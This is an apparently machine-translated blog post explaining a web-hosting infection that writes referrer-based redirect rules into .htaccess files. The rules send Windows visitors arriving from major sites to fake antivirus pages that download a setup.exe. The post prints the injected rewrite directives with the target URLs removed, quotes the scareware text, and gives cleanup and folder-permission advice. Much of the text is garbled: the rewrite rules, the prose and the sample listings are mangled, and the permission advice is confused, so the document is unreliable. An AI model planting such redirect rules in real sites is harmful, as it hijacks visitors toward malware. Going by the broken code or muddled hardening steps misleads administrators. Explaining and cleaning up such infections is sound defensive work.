Malware / Virus - .htaccess "rewrite" & redirect

A new form of virus who see that not know very much affects sites hosted on unreliable servers where users accounts / sub accounts can "see" each other. Specifically, hosting accounts are made all in folder "vhosts"Writing and the right of user folder the "vhosts" is given a general user ... reseller in most situations. It is a method that does not use the typical web servers WHM / cPanel.

Virus action. Htaccess -. Htaccess Hack

Virus affects files .htaccess the victim site. Lines are added / Directives to redirect visitors (Coming from yahoo, msn, google, facebook, yaindex, twitter, myspace, etc. sites and portals with high traffic) to some websites that offer "antivirus. "It is fake antivirus, About which I wrote in the introduction to .

This is how .htaccess affected: (not access the content URLs lines below)

ErrorDocument 500 hxxp://
ErrorDocument 502 hxxp://
ErrorDocument 403 hxxp://

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Search. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. * Windows. *
RewriteRule. * [R, L]

RewriteCond% {REQUEST_FILENAME}!. * Jpg $ |. * Gif $ |. * Png $
RewriteCond% {HTTP_USER_AGENT}. * Windows. *
RewriteRule. * [R, L]

Those who use WordPress will find these lines in the file .htaccess from public_html. In addition, the virus creates a. Htaccess file in the same folder wp-content.

*There are also situations in which instead appears or other addresses.

What makes this virus.

Once redirected, the visitor is greeted with open arms by the message:

Your computer contains various signs of viruses and malware programs Presence. Your anti virus system Requires immediate check!
Security System Will perform a quick and free scanning of your PC for viruses and malicious programs.

1 malware

No matter which button is pressed, we are taken to the page "My Computer"Created to mimic XP design. This automatically starts "scanning" at the end of which we find that "infected".

2 malware

After you click OK or Cancel, it will start downloadFile's setup.exe. This setup.exe is fake anti virus affecting the system. Install some malware to propagate further links compromised, and besides these a anti-virus software (All false) that the victim is invited to buy.
Those who have already contacted the virus may use this form . It is also recommended to scan the entire HDD. Recommend Kaspersky Internet Security or Kaspersky Anti-Virus.

This type of virus affects Visitor OS operating systems Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 and Windows 95. To date there are no known cases of infection of the operating systems Windows Vista and Windows 7.

How can we eliminate this virus. Htaccess file on the server and how to prevent infection.

1. Analyze suspicious files and erasing codes. To ensure that the file is not affected only .htaccess you should analyze all files . Php si . Js.

2. Rewrite the file. Htaccess and it set the chmod 644 or 744 with write access only owner's user.

3. When you create a hosting account for a website in folder / Home or / Webroot This will automatically create a folder which often has the user's name (user for cpanel, ftpEtc.). To prevent writing data and transmitting viruses from one user to another, it is recommended that each user folder to be set:

chmod 644 or 744, 755 - shown is 644.
chown-R nume_user nume_folder.
chgrp-R nume_user nume_folder

ls-all ways to check if they were made correctly. Should appear something like this:

drwx-x-x 12 dinamics dinamics May 4096 6 14: 51 dinamics /
drwx-x-x 10 4096 March 7 07 Duran Duran: Duran 46 /
drwx-x-x 12 tubes tubes 4096 Jan 29 11: 23 tubes /
drwxr-xr-x 14 4096 February 26 2009 Express Express Express /
drwxr-xr-x 9 EZO EZO 4096 May 19 01: 09 EZO /
drwx-x-x 9 pharma pharma 4096 December 19 22: 29 pharma /

If one of the above will userele FTP Infected filesIt can not send the virus to another user host. Is a minimum safety measure to protect the accounts hosted on a web server.

Common elements of areas affected by this virus.

All areas affected redirect visitors to sites by domain name containing "/".

This "virus. htaccess"Affect any CMS (Joomla, WordPress, phpBBEtc.) using .htaccess.

. Htaccess Redirect Virus Hack &.

Malware / Virus - .htaccess "rewrite" & redirect

About the author

Stealth LP

Founder and editor Stealth SettingsIn 2006 date.
Experience on Linux operating systems (especially CentOS), Mac OS X, Windows XP> Windows 10 and WordPress (CMS).

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment is processed.